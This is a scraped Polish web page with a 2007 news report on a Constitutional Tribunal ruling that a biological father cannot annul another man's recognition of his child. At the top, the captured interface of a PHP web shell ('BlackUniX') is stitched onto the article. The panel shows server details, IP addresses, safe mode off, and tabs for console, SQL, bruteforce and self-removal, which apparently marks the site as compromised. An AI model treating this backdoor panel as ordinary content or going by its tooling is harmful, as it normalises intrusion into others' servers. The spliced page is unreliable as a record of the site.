W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-20 07:08:53
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.92.153.90
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Czy ojciec biologiczny może unieważnić uznanie dziecka?
18.04.2007.
Biologiczna więź ojca z dzieckiem nie podlega bezwzględnej ochronie konstytucyjnej; granicą, która określa zakres tej ochrony jest dobro dziecka i stabilność relacji rodzinnych - uznał Trybunał Konstytucyjny.

Trybunał badał, czy biologiczny ojciec dziecka powinien mieć prawo ubiegać się o unieważnienie uznania jego dziecka przez innego mężczyznę. "W sytuacji, gdy relacje rodzinne zostały już wcześniej ukształtowane w przewidziany prawem sposób, dobro dziecka rozstrzyga o pierwszeństwie stabilizacji nawiązanych więzi rodzinnych, nawet gdyby nie było pewności co do tego, czy stan ten odpowiada biologicznemu pochodzeniu dziecka" - orzekł TK.

Sąd oddalił powództwo

Trybunał rozpatrywał skargę Adama T., który nie uznał swojego syna w urzędzie stanu cywilnego. Kiedy matka dziecka związała się z innym mężczyzną, a ten uznał dziecko, Adam T. zwrócił się do sądu o unieważnienie tego i ustalenie, że to on jest ojcem. Sąd rejonowy oddalił powództwo, a sąd apelacyjny utrzymał ten wyrok w mocy.

W ocenie Trybunału utożsamianie dobra dziecka z prawami jego biologicznego ojca jest błędne.

W skardze Adam T. zwracał uwagę, że Trybunał Konstytucyjny w roku 2003 uznał niekonstytucyjność przepisów, które uniemożliwiały biologicznemu ojcu wniesienie powództwa o ustalenie ojcostwa. Trybunał tymczasem podkreślił, że z tego faktu nie można wywodzić, że "biologiczny ojciec ma prawo kontestować uznanie swojego dziecka przez innego mężczyznę". Ponadto - jak zaznaczył Trybunał - w tamtym przypadku ojcostwo dziecka nie było ustalone.

Zgodność z prawdą biologiczną

"Uznanie dziecka jest to akt woli i wiedzy mężczyzny, składającego oświadczenie, do którego potrzebna jest zgoda matki dziecka. Uznanie jest alternatywną wobec sądowej formą ustalenia ojcostwa; nie jest poprzedzone ustaleniami, które mogłyby prowadzić do weryfikacji oświadczenia mężczyzny - podkreślił Trybunał. I dodał, że "zgodność z prawdą biologiczną" "nie jest elementem bezwzględnie warunkującym ważność uznania dziecka".

"Uznanie powinno prowadzić do powstania trwałych, a tym samym stabilnych skutków prawnych, bowiem dobro dziecka wymaga, aby raz ustalony jego stan cywilny nie ulegał zmianom, które w dodatku byłyby zależne od mogącego ulegać zmianom stanowiska mężczyzny, który dokonał uznania".

Protest po osiemnastce

Przepisy kodeksu rodzinnego i opiekuńczego przewidują, że dziecko, które zostało uznane przed osiągnięciem pełnoletności, może żądać unieważnienia uznania, jeżeli mężczyzna, który je uznał, nie jest jego ojcem. Z żądaniem tym dziecko może wystąpić po dojściu do pełnoletności, nie później jednak niż w ciągu trzech lat od jej osiągnięcia.


Czytaj w interia.pl

 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:

Odwiedza nas 1 gość
20.06.2018.